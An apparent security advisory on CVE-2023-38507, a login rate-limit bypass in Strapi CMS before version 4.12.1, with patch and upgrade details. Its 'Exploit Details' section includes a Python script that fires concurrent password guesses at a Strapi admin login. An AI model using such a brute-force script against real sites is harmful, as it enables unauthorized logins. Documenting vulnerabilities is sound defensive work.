CVE-2023-38507: Strapi CMS Prior to Version 4.12.1 is Susceptible to Login Brute Force Attack Due to Rate Limit Bypass

Strapi is a leading open-source headless content management system (CMS). These systems allow for efficient organization, storage, and retrieval of digital content, making them essential tools for many businesses and web developers. However, a recent vulnerability has been discovered in Strapi versions prior to 4.12.1 that puts user data at risk.

Prior to version 4.12.1, Strapi's admin screen has a rate limit on the login function. This rate limit is intended to prevent brute force attacks, where attackers attempt to gain access by trying multiple passwords in rapid succession. Unfortunately, this login rate limit can be bypassed, leaving the system susceptible to brute force attacks and unauthorized logins.

The vulnerability has been assigned the CVE-2023-38507 identifier, and a fix has been implemented in Strapi version 4.12.1.

Exploit Details

The rate limit implemented in Strapi's admin screen is not properly enforced, and attackers can bypass this limitation by creating multiple requests with concurrent connections. This allows them to attempt unauthorized logins at a much faster pace than would be possible if the rate limit was correctly enforced.

The code snippet below demonstrates how this rate limit bypass can be achieved

import requests
import threading

# Target Strapi URL and credentials
target_url = "https://target-strapi-site.com/admin/login";
user_email = "admin@example.com"
password_list = ["password1", "password2", "password3"]  # List of possible passwords

# Function to attempt login with a specific password
def login_attempt(password):
    payload = {
        "email": user_email,
        "password": password
    }
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print(f"[+] Password found: {password}")

# Use threading to create multiple concurrent requests
for password in password_list:
    t = threading.Thread(target=login_attempt, args=(password,))
    t.start()

This code snippet shows a Python script that creates concurrent login requests to a target Strapi site, effectively bypassing the rate limit and increasing the chances of a successful brute force attack.

Strapi's Response and Patch

Before the issue of CVE-2023-38507 was publicized, Strapi acknowledged the vulnerability and swiftly provided a fix in version 4.12.1. Users of Strapi are advised to update their systems to the latest version in order to prevent potential unauthorized logins through brute force attacks.

The relevant commit details for the fix can be found here.

References

1. _Strapi_: Official website
2. _CVE Details_: CVE-2023-38507
3. _GitHub_: Strapi repository
4. _GitHub Commit_: Rate limit bypass fix

Conclusion

Although Strapi is a popular and powerful headless content management system, it remains vulnerable to attacks if users aren't diligent about maintaining updated versions. By updating Strapi to version 4.12.1 or later, users can ensure their systems are no longer susceptible to login brute force attacks via rate limit bypasses.

Timeline

Published on: 09/15/2023 20:15:00 UTC
Last modified on: 09/21/2023 14:09:00 UTC